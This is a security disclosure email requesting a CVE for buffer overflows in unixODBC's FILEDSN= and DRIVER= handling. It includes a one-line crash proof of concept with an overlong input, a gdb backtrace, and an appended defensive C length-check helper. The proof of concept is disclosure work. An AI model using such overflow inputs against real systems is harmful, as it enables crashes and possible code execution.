Date: Tue, 29 May 2012 09:42:42 -0300
From: Felipe Pena <felipensp@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE id request: Multiple buffer overflow in unixODBC

Hi, please assign a CVE id for the issue:

Multiple buffer overflow in unixODBC
===========================

The unixODBC library doesn't properly check the input from the FILEDSN=
and DRIVER= options in the DSN, which causes a buffer overflow when
passed to the SQLDriverConnect() function.

The unixODBC maintainer has been notified about the issue.

Version affected
============

FILEDSN= as of 2.0.10
DRIVER= as of 2.3.1

PoC
===

$ ./poc "FILEDSN=$(python -c "print 'A'*10000")"
Segmentation fault

(gdb) bt
#0  0x00007ffff7bc8c81 in SQLReadFileDSN (pszFileName=<value optimized out>, pszAppName=<value optimized out>, pszKeyName=<value optimized out>, pszString=<value optimized out>, nString=<value optimized out>, pnString=<value optimized out>) at SQLReadFileDSN.c:207
#1  0x4141414141414141 in ?? ()


CREDITS
=======

This bug was discovered by Felipe Pena.
BugSec Team - http://www.bugsec.com.br/
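
An application-side guard for the condition reported above, as an added example that is not part of the original post and is not unixODBC code: it rejects a connection string whose FILEDSN= or DRIVER= value is over a length limit before the string reaches SQLDriverConnect(). The names conn_str_ok and MAX_ATTR_VALUE and the 255-byte limit are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Assumed application policy limit; not a unixODBC constant. */
#define MAX_ATTR_VALUE 255

/* Case-insensitive compare of a key of length klen with an upper-case name. */
static int key_is(const char *key, size_t klen, const char *name)
{
    if (klen != strlen(name)) return 0;
    for (size_t i = 0; i < klen; i++)
        if (toupper((unsigned char)key[i]) != name[i]) return 0;
    return 1;
}

/* Hypothetical helper: returns 1 if every FILEDSN=/DRIVER= value in conn is
 * at most max_len bytes, 0 if one is longer or a braced value is unterminated. */
int conn_str_ok(const char *conn, size_t max_len)
{
    const char *p = conn;
    while (*p) {
        while (*p == ';' || *p == ' ') p++;      /* skip separators */
        if (!*p) break;
        const char *eq = strchr(p, '=');
        const char *semi = strchr(p, ';');
        if (!eq || (semi && semi < eq)) {        /* attribute without '=' */
            if (!semi) break;
            p = semi + 1;
            continue;
        }
        size_t klen = (size_t)(eq - p);
        while (klen && p[klen - 1] == ' ') klen--;   /* trim "KEY =" */
        const char *val = eq + 1, *end;
        if (*val == '{') {                       /* braced value may hold ';' */
            end = strchr(val, '}');
            if (!end) return 0;
            end++;
        } else {
            end = strchr(val, ';');
            if (!end) end = val + strlen(val);
        }
        if ((key_is(p, klen, "FILEDSN") || key_is(p, klen, "DRIVER")) &&
            (size_t)(end - val) > max_len)
            return 0;
        p = end;
    }
    return 1;
}
```

A caller would run this on any connection string built from untrusted input and refuse to connect when it returns 0; it does not replace updating the library.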
